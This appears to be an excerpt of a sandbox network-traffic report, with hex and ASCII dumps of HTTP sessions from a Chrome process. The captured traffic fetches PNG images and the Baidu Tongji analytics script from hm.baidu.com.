                                                      2025-01-12 23:47:56 UTC3740INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 52 00 00 01 4c 08 06 00 00 00 c1 65 8d c5 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 52 21 49 44 41 54 78 da ec 9d 89 ad f4 36 d2 76 ed 8b 4e cc d1 38 03 07 e1 0c 1c 8d 43 f3 0f e3 47 7f a3 d1 70 a9 a7 16 8a 92 ce 01 06 e3 fb 76 37 59 ac 8d 8b 28 f2 97 5f 1e c0 6f 7f fc fe cf 1b e5 bc 4b bb 77 d2 e5 9b 75 f6 66 aa ed 8e 5f ad d7 e1 93 74 7e 6c 4b ef bf b1 39 7d ea 1d ec f6 d4 b8 04 7c be f7 d9 a7 f5 85 bf ff fc eb 57 d4 06 00 00 00 00 00 d0 e6 e7 38 79 fa fe 6f f5 2c 3c 5a df 5b 27 7e 4c 78 63 3a 63 b5 09 f0 85 fb e8 30 ab fc 1d 6d fd 96 5c ce a2 2d e3 12 72 33 3c cd af 7f 50 0f 00 00 00 00 00 80 c6 c7 b2 1a 70 9e 89 b5 fe ed
                                                      Data Ascii: PNGIHDRRLetEXtSoftwareAdobe ImageReadyqe<R!IDATx6vN8CGpv7Y(_oKwuf_t~lK9}|W8yo,<Z['~Lxc:c0m\-r3<Pp
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 7f ca f2 81 4c fd 5b e5 cb 8c 27 f5 f0 b5 a8 ef 66 f5 1d de fe a2 7a 6c 98 3d b6 95 9e 48 a9 4f 04 ac e5 64 6c 21 cc 92 4b 95 53 dd aa 93 5d 5e 95 4d 7a 9f f7 ca f3 6e 59 1a fd 2e a2 db 2a 9d af d0 91 75 65 36 4b e6 4a df 6a ad e0 1c 57 79 ce b6 89 d8 29 ab 9d bd 27 26 59 65 a9 3a ab c8 9f a3 ef f7 56 85 2d ed b0 ca 3e 2a 2f 12 43 15 4f 25 a3 ba ae c8 f9 19 65 67 e7 92 e8 b6 d5 ac 3c ac ca 31 7a b5 a1 da ae 4a 5c 8d ea ca f2 fb 4a fb 7a eb f4 e4 02 eb d3 e1 8c b1 c5 68 d2 14 e9 b3 22 79 27 ea bb de 9d 1f 99 7d dd 8a b1 61 d6 b8 ed b3 2a 20 ae e4 cd ef 25 64 b5 7d b6 e5 11 f2 74 34 9b 10 aa 8f ce 89 2b da 9a 31 68 b5 6e 61 53 fc 7f b6 a5 2f 32 69 81 b8 4d d1 c3 3d ea 7e a2 fd 2a c6 1c 99 7a b2 6c d3 7c 62 7c 3d 6d 4c 99 21 c7 cf 68 36 a6 ae 58 79 b7 e7 ad
                                                      Data Ascii: L['fzl=HOdl!KS]^MznY.*ue6KJjWy)'&Ye:V->*/CO%eg<1zJ\Jzh"y'}a* %d}t4+1hnaS/2iM=~*zl|b|=mL!h6Xy
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 05 74 8d 0d 01 9f 78 5e 5b 89 81 1a 3f 59 fd 22 3e 3a 27 9f bf 5d 0f 57 b4 7b a7 1c ba d3 41 18 ca bb ff 1e 78 22 75 52 68 ef 65 b8 33 ac 4e 5c 67 97 d9 bf c3 3d ed db bb ed 3e 23 b6 3c b7 ab 57 9f 2a fa 76 1b 13 cb 00 00 b5 e3 24 b8 d9 cc b9 62 0f e9 aa 99 6c ef 16 ee 91 1c ca ad dc f8 58 ee 69 8c 4f d4 e9 db 57 ee 3c 37 de 7b 7c 65 e7 b8 7d aa 9f 7b f2 2b d4 e4 0e 9e 48 ad d1 63 e4 28 6f 62 03 ee 1e 7f bb 1e cd 5e 21 0b 87 4d 00 c0 a3 99 bd 6f c6 2a 1e 00 00 00 78 f8 f4 66 6a c7 2d 36 ad ad 30 bd ed 31 a3 f3 e2 ad 5b 6a 66 65 8e b6 fd 1c b7 90 58 06 52 d5 b3 65 4b 1b 46 f2 ab 9f 59 75 1b b1 b9 2a bb aa 83 de 60 78 b4 3d c8 e2 13 d6 c1 f3 ac 2c c5 2e b3 3a 54 db cc e4 53 ea ea 95 63 f9 77 cf f6 b8 d9 0d e7 de 3b 61 2c be a6 96 13 89 23 af 7f 54 e4 d0 91
                                                      Data Ascii: tx^[?Y">:']W{Ax"uRhe3N\g=>#<W*v$blXiOW<7{|e}{+Hc(ob^!Mo*xfj-601[jfeXReKFYu*`x=,.:TScw;a,#T
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 6d 61 d9 8e 3f 93 21 22 e3 8a 63 9b 47 f2 59 57 87 22 ed aa 6c 63 44 c6 6c ff a9 92 a5 b2 8d 6a 0e 50 de 5f f1 c8 aa 6c 77 da 41 7f 99 f5 29 fe 56 15 5f 8a 7d b3 f5 9b b1 42 bc c2 d6 ab fc a9 ba 9e 2b fa e4 1d 26 07 57 ca 3f cb 6f d9 bb 40 ee 16 0f 19 fa a9 9a 18 29 db 1b e1 79 7c ce c6 ff 1e 0f 7c 76 00 e5 25 e2 8c 20 6f c9 75 ae 6f 26 63 e5 e4 cf 22 83 a2 47 ef e1 15 99 f2 5b eb 6a fd ae f7 12 bb 52 67 e6 0b 9b 51 ff c8 f4 1f ab 9f 64 d8 cf ba e8 61 d9 92 35 f2 8d d6 77 cf 7f ab b1 90 dd d6 55 3e 52 a1 53 6f 8e f4 c6 97 f5 90 0f a5 1f f0 ea d7 7b 00 8c 22 8b 35 0f 5f ed a3 57 e4 b6 2b fa e4 d9 d3 a6 c8 a1 0a 56 3f af ca d3 d1 be d8 92 5f 9f 1e 0f 51 fd 44 0e 9a 88 e4 5c 80 d2 49 08 e0 13 00 40 cc a3 23 74 84 9e 88 07 80 bb c2 3d 52 10 4e 86 24 47 00 20
                                                      Data Ascii: ma?!"cGYW"lcDljP_lwA)V_}B+&W?o@)y||v% ouo&c"G[jRgQda5wU>RSo{"5_W+V?_QD\I@#t=RN$G
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 6d 91 5b 59 85 b1 dc 8d a2 fa 82 67 db 94 c7 77 d4 95 ba 63 59 b3 32 2b 6c 90 11 53 5e 9f 54 26 19 9e 1c a8 5c 6e 38 f2 ff f3 2d f3 bb 1c 5a d0 ca 51 bd bf 55 7f 98 fd ed dd 02 a3 fa 84 6a 63 4f 0e 5e 91 e7 ac 3a 18 e5 7d ab 1f 5a 72 6a 65 5f 74 65 5e cd 8e 89 15 f1 10 f1 6f e5 5e 32 c5 7f 47 3e a8 c4 4a 64 8c e4 1d bb 5a f4 6b f5 e7 99 ff 64 8e 05 76 e9 e3 23 f3 8e 59 ee fa 9f ef b5 5e 48 1b bd 70 38 bb a1 7c f6 1b cb df d6 c4 ed 29 7b 76 c3 f8 ac bd 96 97 31 2d 03 1f e5 a6 73 c5 1e 19 e5 aa 09 5f d5 71 96 3d 55 b9 2d f5 79 cb cd b2 61 b6 8d 3c f5 5a da 63 95 f1 2a 1b 44 ec 31 b3 ad 9a b7 3c 39 d2 1b e3 56 1b 45 72 ae b7 9d 16 db 8d da eb f5 07 6b 99 8a 4e 2c 97 f0 46 6c ac e6 82 55 31 16 ed c7 ab 72 50 76 5f 74 75 5e cd 8e 89 ca 78 50 db ed c9 9d 1e ff
                                                      Data Ascii: m[YgwcY2+lS^T&\n8-ZQUjcO^:}Zrje_te^o^2G>JdZkdv#Y^Hp8|){v1-s_q=U-ya<Zc*D1<9VErkN,FlU1rPv_tu^xP
                                                      2025-01-12 23:47:56 UTC995INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 77 e1 b7 3f 7e ff a7 f5 df 77 90 57 f9 ac aa 4e b8 d6 17 22 b6 a9 f4 fd bb f8 cc 2e 72 ae 92 e3 e9 f9 03 9f 8e b7 e3 6e 7d e2 2e 36 a6 9f 04 00 2f 9f 7f 13 c8 df 7f fe f5 6b 2b b1 9c ff bd f7 5d 78 6f 67 85 3f f8 74 68 d1 1b ba 06 f2 07 6d bb 43 7b c9 4d 00 f0 56 7e 9e d2 10 12 79 bb 33 af 28 fb 5f 5d 7f ff f7 c6 95 bc 15 6d 9e e9 7a 95 bf b3 52 fb 2e 5d 5e 99 3f ee ec d3 3b e6 c6 4a 7d 7e 17 83 76 ea 07 22 ed 65 fc 00 00 ee 89 54 2b 09 7e ff 3e 6f 13 20 d9 30 08 3c fb 00 3e 81 ae 01 de ec d3 6f 8b d7 d6 58 80 dc 04 00 6f e5 13 ed 3c ac 49 b4 d5 d9 7c 13 f2 f9 33 cf 2a e5 39 b9 f7 b6 59 f4 ca ee c9
                                                      Data Ascii: w?~wWN".rn}.6/k+]xog?thmC{MV~y3(_]mzR.]^?;J}~v"eT+~>o 0<>oXo<I|3*9Y


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      93192.168.2.449847111.45.3.1984434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:56 UTC544OUTGET /hm.js?947ea0365dd8ab01fc51bd9439b42930 HTTP/1.1
                                                      Host: hm.baidu.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:56 UTC615INHTTP/1.1 200 OK
                                                      Cache-Control: max-age=0, must-revalidate
                                                      Content-Length: 29903
                                                      Content-Type: application/javascript
                                                      Date: Sun, 12 Jan 2025 23:47:56 GMT
                                                      Etag: 212cb7224b20495fcedcef6081553c65
                                                      P3p: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                      Server: apache
                                                      Set-Cookie: HMACCOUNT=E4D1CF12C6FA10DD; Path=/; Domain=hm.baidu.com; Expires=Sun, 18 Jan 2038 00:00:00 GMT
                                                      Set-Cookie: HMACCOUNT_BFESS=E4D1CF12C6FA10DD; Path=/; Domain=hm.baidu.com; Expires=Mon, 18 Jan 2038 00:00:00 GMT; Secure; SameSite=None
                                                      Strict-Transport-Security: max-age=172800
                                                      Connection: close
                                                      2025-01-12 23:47:56 UTC564INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 7b 7d 2c 6d 74 3d 7b 7d 2c 63 3d 7b 69 64 3a 22 39 34 37 65 61 30 33 36 35 64 64 38 61 62 30 31 66 63 35 31 62 64 39 34 33 39 62 34 32 39 33 30 22 2c 64 6d 3a 5b 22 62 74 35 2e 6d 6b 6c 6f 6a 6f 69 6b 6d 2e 63 6f 6d 22 5d 2c 6a 73 3a 22 74 6f 6e 67 6a 69 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2d 77 65 62 2f 6a 73 2f 22 2c 65 74 72 6b 3a 5b 5d 2c 63 65 74 72 6b 3a 5b 5d 2c 63 70 74 72 6b 3a 5b 5d 2c 69 63 6f 6e 3a 27 27 2c 63 74 72 6b 3a 5b 5d 2c 76 64 75 72 3a 31 38 30 30 30 30 30 2c 61 67 65 3a 33 31 35 33 36 30 30 30 30 30 30 2c 71 69 61 6f 3a 30 2c 70 74 3a 30 2c 73 70 61 3a 30 2c 61 65 74 3a 27 27 2c 68 63 61 3a 27 45 34 44 31 43 46 31 32 43 36 46 41 31 30 44 44 27 2c 61 62 3a 27 30 27 2c 76 3a 31
                                                      Data Ascii: (function(){var h={},mt={},c={id:"947ea0365dd8ab01fc51bd9439b42930",dm:["bt5.mklojoikm.com"],js:"tongji.baidu.com/hm-web/js/",etrk:[],cetrk:[],cptrk:[],icon:'',ctrk:[],vdur:1800000,age:31536000000,qiao:0,pt:0,spa:0,aet:'',hca:'E4D1CF12C6FA10DD',ab:'0',v:1
                                                      2025-01-12 23:47:56 UTC449INData Raw: 67 45 78 70 28 22 28 5e 7c 20 29 22 2b 65 2b 22 3d 28 5b 5e 3b 5d 2a 29 28 3b 7c 24 29 22 29 2e 65 78 65 63 28 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 29 29 3f 65 5b 32 5d 3a 75 7d 3b 0a 6d 74 2e 63 6f 6f 6b 69 65 2e 72 62 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 61 29 7b 74 72 79 7b 76 61 72 20 62 3d 22 48 6d 5f 63 6b 5f 22 2b 20 2b 6e 65 77 20 44 61 74 65 3b 6d 74 2e 63 6f 6f 6b 69 65 2e 73 65 74 28 62 2c 22 34 32 22 2c 7b 64 6f 6d 61 69 6e 3a 65 2c 70 61 74 68 3a 61 2c 43 3a 73 7d 29 3b 76 61 72 20 6b 3d 22 34 32 22 3d 3d 3d 6d 74 2e 63 6f 6f 6b 69 65 2e 67 65 74 28 62 29 3f 22 31 22 3a 22 30 22 3b 6d 74 2e 63 6f 6f 6b 69 65 2e 73 65 74 28 62 2c 22 22 2c 7b 64 6f 6d 61 69 6e 3a 65 2c 70 61 74 68 3a 61 2c 43 3a 2d 31 7d 29 3b 72 65 74 75 72 6e 20 6b 7d
                                                      Data Ascii: gExp("(^| )"+e+"=([^;]*)(;|$)").exec(document.cookie))?e[2]:u};mt.cookie.rb=function(e,a){try{var b="Hm_ck_"+ +new Date;mt.cookie.set(b,"42",{domain:e,path:a,C:s});var k="42"===mt.cookie.get(b)?"1":"0";mt.cookie.set(b,"",{domain:e,path:a,C:-1});return k}
                                                      2025-01-12 23:47:56 UTC3537INData Raw: 2e 65 76 65 6e 74 3b 6d 74 2e 6c 61 6e 67 3d 7b 7d 3b 6d 74 2e 6c 61 6e 67 2e 69 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 22 5b 6f 62 6a 65 63 74 20 22 2b 62 2b 22 5d 22 3d 3d 3d 7b 7d 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 61 29 7d 3b 6d 74 2e 6c 61 6e 67 2e 6a 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6d 74 2e 6c 61 6e 67 2e 69 28 61 2c 22 46 75 6e 63 74 69 6f 6e 22 29 7d 3b 6d 74 2e 6c 61 6e 67 2e 4a 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6d 74 2e 6c 61 6e 67 2e 69 28 61 2c 22 4f 62 6a 65 63 74 22 29 7d 3b 6d 74 2e 6c 61 6e 67 2e 58 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6d 74 2e 6c 61 6e 67 2e 69 28 61 2c 22 4e 75 6d 62 65 72 22 29 26 26 69 73 46 69 6e 69 74 65
                                                      Data Ascii: .event;mt.lang={};mt.lang.i=function(a,b){return"[object "+b+"]"==={}.toString.call(a)};mt.lang.j=function(a){return mt.lang.i(a,"Function")};mt.lang.J=function(a){return mt.lang.i(a,"Object")};mt.lang.Xb=function(a){return mt.lang.i(a,"Number")&&isFinite
                                                      2025-01-12 23:47:56 UTC4716INData Raw: 2c 70 3d 30 3b 70 3c 65 3b 70 2b 2b 29 7b 76 61 72 20 6e 3d 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 70 5d 3b 69 66 28 6e 2e 6e 6f 64 65 4e 61 6d 65 3d 3d 3d 62 2e 6e 6f 64 65 4e 61 6d 65 26 26 28 67 2b 2b 2c 6e 3d 3d 3d 62 26 26 28 6c 3d 67 29 2c 30 3c 6c 26 26 31 3c 67 29 29 62 72 65 61 6b 7d 69 66 28 28 65 3d 22 22 21 3d 3d 62 2e 69 64 29 26 26 61 29 7b 64 2e 75 6e 73 68 69 66 74 28 22 23 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 62 2e 69 64 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 65 26 26 28 65 3d 22 23 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 62 2e 69 64 29 2c 65 3d 30 3c 64 2e 6c 65 6e 67 74 68 3f 65 2b 22 3e 22 2b 64 2e 6a 6f 69 6e 28 22 3e 22 29 3a 65 2c 66 2e 70 75 73 68
                                                      Data Ascii: ,p=0;p<e;p++){var n=b.parentNode.childNodes[p];if(n.nodeName===b.nodeName&&(g++,n===b&&(l=g),0<l&&1<g))break}if((e=""!==b.id)&&a){d.unshift("#"+encodeURIComponent(b.id));break}else e&&(e="#"+encodeURIComponent(b.id),e=0<d.length?e+">"+d.join(">"):e,f.push
                                                      2025-01-12 23:47:56 UTC4779INData Raw: 5c 6e 22 2c 22 5c 66 22 3a 22 5c 5c 66 22 2c 22 5c 72 22 3a 22 5c 5c 72 22 2c 27 22 27 3a 27 5c 5c 22 27 2c 22 5c 5c 22 3a 22 5c 5c 5c 5c 22 7d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 62 29 7b 63 61 73 65 20 22 75 6e 64 65 66 69 6e 65 64 22 3a 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3b 63 61 73 65 20 22 6e 75 6d 62 65 72 22 3a 72 65 74 75 72 6e 20 69 73 46 69 6e 69 74 65 28 62 29 3f 53 74 72 69 6e 67 28 62 29 3a 22 6e 75 6c 6c 22 3b 63 61 73 65 20 22 73 74 72 69 6e 67 22 3a 72 65 74 75 72 6e 20 65 28 62 29 3b 63 61 73 65 20 22 62 6f 6f 6c 65 61 6e 22 3a 72 65 74 75 72 6e 20 53 74 72 69 6e 67 28 62 29 3b 0a 64 65 66 61 75 6c 74 3a 69 66 28 62 3d 3d 3d 75 29 72 65 74 75 72 6e 22 6e 75
                                                      Data Ascii: \n","\f":"\\f","\r":"\\r",'"':'\\"',"\\":"\\\\"};return function(b){switch(typeof b){case "undefined":return"undefined";case "number":return isFinite(b)?String(b):"null";case "string":return e(b);case "boolean":return String(b);default:if(b===u)return"nu
                                                      2025-01-12 23:47:56 UTC1448INData Raw: 68 6d 63 64 6e 2e 62 61 69 64 75 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 74 6f 6e 67 6a 69 2f 70 6c 75 67 69 6e 73 2f 22 2c 6e 61 3a 5b 22 55 72 6c 43 68 61 6e 67 65 54 72 61 63 6b 65 72 22 5d 2c 4f 62 3a 7b 61 63 3a 30 2c 6a 63 3a 31 2c 59 62 3a 32 7d 2c 5a 62 3a 22 68 74 74 70 73 3a 2f 2f 66 63 6c 6f 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 6c 6f 67 2f 6f 63 70 63 61 67 6c 3f 74 79 70 65 3d 62 65 68 61 76 69 6f 72 26 65 6d 64 3d 65 75 63 22 7d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 74 3a 7b 7d 2c 63 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 68 69 73 2e 74 5b 61 5d 3d 74 68 69 73 2e 74 5b 61 5d 7c 7c 5b 5d 3b 74 68 69 73 2e 74 5b 61 5d 2e 70 75 73 68 28 62 29 7d 2c 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 68 69 73 2e 74 5b
                                                      Data Ascii: hmcdn.baidu.com/static/tongji/plugins/",na:["UrlChangeTracker"],Ob:{ac:0,jc:1,Yb:2},Zb:"https://fclog.baidu.com/log/ocpcagl?type=behavior&emd=euc"};(function(){var e={t:{},c:function(a,b){this.t[a]=this.t[a]||[];this.t[a].push(b)},k:function(a,b){this.t[
                                                      2025-01-12 23:47:56 UTC4344INData Raw: 20 65 3d 68 2e 6f 2c 61 3d 7b 44 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 22 22 21 3d 3d 63 2e 69 63 6f 6e 29 7b 76 61 72 20 61 3d 63 2e 69 63 6f 6e 2e 73 70 6c 69 74 28 22 7c 22 29 2c 6b 3d 65 2e 6b 62 2b 22 3f 73 3d 22 2b 63 2e 69 64 2c 64 3d 22 68 74 74 70 73 3a 2f 2f 68 6d 63 64 6e 2e 62 61 69 64 75 2e 63 6f 6d 2f 73 74 61 74 69 63 22 2b 61 5b 30 5d 2b 22 2e 67 69 66 22 3b 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 22 73 77 66 22 3d 3d 3d 61 5b 31 5d 7c 7c 22 67 69 66 22 3d 3d 3d 61 5b 31 5d 3f 27 3c 61 20 68 72 65 66 3d 22 27 2b 6b 2b 27 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 62 6f 72 64 65 72 3d 22 30 22 20 73 72 63 3d 22 27 2b 64 2b 27 22 20 77 69 64 74 68 3d 22 27 2b 61 5b 32 5d 2b 27 22 20 68 65 69 67 68 74 3d
                                                      Data Ascii: e=h.o,a={D:function(){if(""!==c.icon){var a=c.icon.split("|"),k=e.kb+"?s="+c.id,d="https://hmcdn.baidu.com/static"+a[0]+".gif";document.write("swf"===a[1]||"gif"===a[1]?'<a href="'+k+'" target="_blank"><img border="0" src="'+d+'" width="'+a[2]+'" height=
                                                      2025-01-12 23:47:56 UTC4344INData Raw: 3b 72 3d 70 3b 43 3d 73 65 74 54 69 6d 65 6f 75 74 28 61 2c 31 30 30 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2c 64 3d 22 22 3b 69 66 28 62 20 69 6e 20 61 29 64 3d 62 3b 65 6c 73 65 20 66 6f 72 28 76 61 72 20 6d 3d 5b 22 77 65 62 6b 69 74 22 2c 22 6d 73 22 2c 22 6d 6f 7a 22 2c 22 6f 22 5d 2c 65 3d 30 3b 65 3c 6d 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 7b 76 61 72 20 66 3d 6d 5b 65 5d 2b 62 2e 63 68 61 72 41 74 28 30 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 2b 62 2e 73 6c 69 63 65 28 31 29 3b 69 66 28 66 20 69 6e 20 61 29 7b 64 3d 66 3b 62 72 65 61 6b 7d 7d 72 65 74 75 72 6e 20 64 7d 0a 66 75 6e 63 74 69 6f 6e 20 6b 28 62 29 7b 69 66 28 21 28 22 66 6f 63 75 73 22 3d 3d 62 2e 74 79 70 65 7c 7c 22 62 6c 75 72
                                                      Data Ascii: ;r=p;C=setTimeout(a,100)}function b(b){var a=document,d="";if(b in a)d=b;else for(var m=["webkit","ms","moz","o"],e=0;e<m.length;e++){var f=m[e]+b.charAt(0).toUpperCase()+b.slice(1);if(f in a){d=f;break}}return d}function k(b){if(!("focus"==b.type||"blur
                                                      2025-01-12 23:47:56 UTC4344INData Raw: 73 65 20 62 72 65 61 6b 7d 7d 7d 2c 5f 72 65 71 75 69 72 65 50 6c 75 67 69 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 31 3c 0a 61 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 64 3d 77 69 6e 64 6f 77 2e 5f 68 6d 74 2c 65 3d 61 5b 31 5d 2c 67 3d 61 5b 32 5d 7c 7c 7b 7d 3b 69 66 28 62 2e 58 28 66 2e 6e 61 2c 65 29 29 69 66 28 64 2e 70 6c 75 67 69 6e 73 3d 64 2e 70 6c 75 67 69 6e 73 7c 7c 7b 7d 2c 64 2e 7a 3d 64 2e 7a 7c 7c 7b 7d 2c 64 2e 70 6c 75 67 69 6e 73 5b 65 5d 26 26 21 64 2e 7a 5b 65 5d 29 64 2e 7a 5b 65 5d 3d 6e 65 77 20 64 2e 70 6c 75 67 69 6e 73 5b 65 5d 28 67 29 3b 65 6c 73 65 7b 64 2e 6c 3d 64 2e 6c 7c 7c 5b 5d 3b 66 6f 72 28 76 61 72 20 67 3d 30 2c 6b 3d 64 2e 6c 2e 6c 65 6e 67 74 68 3b 67 3c 6b 3b 67 2b 2b 29 69 66 28 64 2e 6c 5b 67 5d 5b 31
                                                      Data Ascii: se break}}},_requirePlugin:function(a){if(1<a.length){var d=window._hmt,e=a[1],g=a[2]||{};if(b.X(f.na,e))if(d.plugins=d.plugins||{},d.z=d.z||{},d.plugins[e]&&!d.z[e])d.z[e]=new d.plugins[e](g);else{d.l=d.l||[];for(var g=0,k=d.l.length;g<k;g++)if(d.l[g][1
                                                      2025-01-12 23:47:56 UTC1378INData Raw: 28 6d 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 63 2e 6a 73 2b 65 2b 22 2e 6a 73 3f 22 2b 4d 61 74 68 2e 72 6f 75 6e 64 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 6d 2e 47 29 29 7d 7d 63 61 74 63 68 28 66 29 7b 7d 7d 2c 76 61 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 74 72 79 7b 62 3d 6c 2e 70 61 72 73 65 28 67 2e 67 65 74 28 22 48 6d 5f 75 6e 73 65 6e 74 5f 22 2b 63 2e 69 64 29 7c 7c 22 5b 5d 22 29 7d 63 61 74 63 68 28 64 29 7b 62 3d 5b 5d 7d 76 61 72 20 65 3d 74 68 69 73 2e 61 2e 75 3f 22 22 3a 22 26 75 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 62 2e 70 75 73 68 28 61 2e 72 65 70 6c 61 63 65 28 2f 5e 68 74 74 70 73 3f 3a 5c 2f 5c 2f 2f 2c
                                                      Data Ascii: (m.protocol+"//"+c.js+e+".js?"+Math.round(Math.random()*m.G))}}catch(f){}},va:function(a){var b;try{b=l.parse(g.get("Hm_unsent_"+c.id)||"[]")}catch(d){b=[]}var e=this.a.u?"":"&u="+encodeURIComponent(document.location.href);b.push(a.replace(/^https?:\/\//,


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      94192.168.2.44984820.255.122.93443
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:56 UTC382OUTGET /images_plus/index/g03.png?ver=1606793402 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:56 UTC356INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:56 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 13705
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 03:30:02 GMT
                                                      ETag: "5fc5b8ba-3589"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:56 UTC3740INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 0d 00 00 00 4f 08 03 00 00 00 c6 2b 60 e9 00 00 03 00 50 4c 54 45 00 00 00 01 01 04 03 00 01 09 01 01 06 01 01 02 03 05 06 07 08 0d 01 01 05 05 04 0c 0e 0f 09 0b 0a 0e 11 13 01 03 0b 12 05 02 08 0c 0f 12 15 17 02 07 13 05 08 0c 24 0e 07 2a 14 0c 1a 06 03 49 2e 24 54 3d 27 05 0b 1a 1c 0c 06 61 43 37 30 17 0c 07 12 24 15 19 1d 1c 12 0a 41 28 1e 13 0c 07 1a 2c 40 11 22 35 42 27 11 22 41 5d 4a 3a 25 b1 84 71 28 32 39 0e 1b 2a 49 30 1a 21 45 68 1f 39 55 60 3c 2d 71 50 45 35 24 0e 5b 47 31 59 3b 31 14 12 0f 2a 4d 6e a6 78 60 2d 38 41 1a 23 29 0c 08 05 c8 a1 93 53 33 28 d4 be b8 1e 33 4a 5a 4c 48 38 22 1c 2d 52 76 60 4f 3b 3a 29 18 30 1e 15 69 4a 3f 37 1b 11 d7 c5 b4 92 65 50 78 57 4a 20 28 2e 06 15 2d 1d
                                                      Data Ascii: PNGIHDRO+`PLTE$*I.$T='aC70$A(,@"5B'"A]J:%q(29*I0!Eh9U`<-qPE5$[G1Y;1*Mnx`-8A#)S3(3JZLH8"-Rv`O;:)0iJ?7ePxWJ (.-
